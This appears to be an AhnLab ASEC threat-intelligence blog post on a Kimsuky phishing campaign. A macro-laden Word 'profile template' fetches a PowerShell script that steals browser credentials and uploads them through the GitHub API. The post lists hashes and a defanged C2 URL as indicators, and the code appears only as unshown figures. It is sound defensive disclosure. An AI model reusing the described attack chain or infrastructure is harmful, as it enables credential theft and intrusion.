Kimsuky Group Distributes Malware Disguised as Profile Template (GitHub)

AhnLab Security Emergency response Center (ASEC) has confirmed the distribution of a malicious Word file disguised as a profile template from emails impersonating a certain professor.

‘[Attachment] Profile Template.doc’ is the filename of the password-protected Word file that was discovered, with the password itself being included in the body of the email.

Figure 1. Original email

Figure 2. Part of the Word file contents

Figure 3. File properties

A malicious VBA macro is contained within the Word file, which, upon being activated, connects to a C2 via PowerShell before downloading and executing an additional script.

Figure 4. Part of the malicious VBA macro code (obfuscation removed)

The type of malware that is ultimately executed is the same as the one identified in Malicious Word Document Being Distributed in Disguise of a News Survey as it collects the information saved on browsers.

Figure 5. Part of the final script code

However, unlike the previous code which used FTP to leak user credentials, the team has confirmed that the current version is an altered script that uses the GitHub API to transmit the information to a certain repository.

Figure 6. Collected information transferred through GitHub API (part of the final script code)

Data gathered from victims are believed to have been uploaded onto this GitHub repository in question.

Figure 7. Data uploaded to GitHub

Additionally, there has recently been a confirmed case of the Red Eyes threat group (also known as APT37, ScarCruft) also using GitHub as their malware distribution site. (Refer to the references below)

As scripts are continuously evolving like the one in this post, users are advised to take extra caution.

[File Detection]
Downloader/DOC.Generic (2023.02.22.02)
Trojan/PowerShell.FileUpload.S2023 (2023.02.25.00)

[IOC]

MD5
A25ACC6C420A1BB0FDC9456B4834C1B4
393CBA61A23BF8159053E352ABDD1A76

C2
hxxp://hmcks.realma.r-e[.]kr/gl/ee.txt

[References] 

1) https://blog.sekoia.io/peeking-at-reaper-surveillance-operations-against-north-korea-defectors/

2) https://thehackernews.com/2023/03/scarcrufts-evolving-arsenal-researchers.html

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

The post Kimsuky Group Distributes Malware Disguised as Profile Template (GitHub) appeared first on ASEC BLOG.

Article Link: Kimsuky Group Distributes Malware Disguised as Profile Template (GitHub) - ASEC BLOG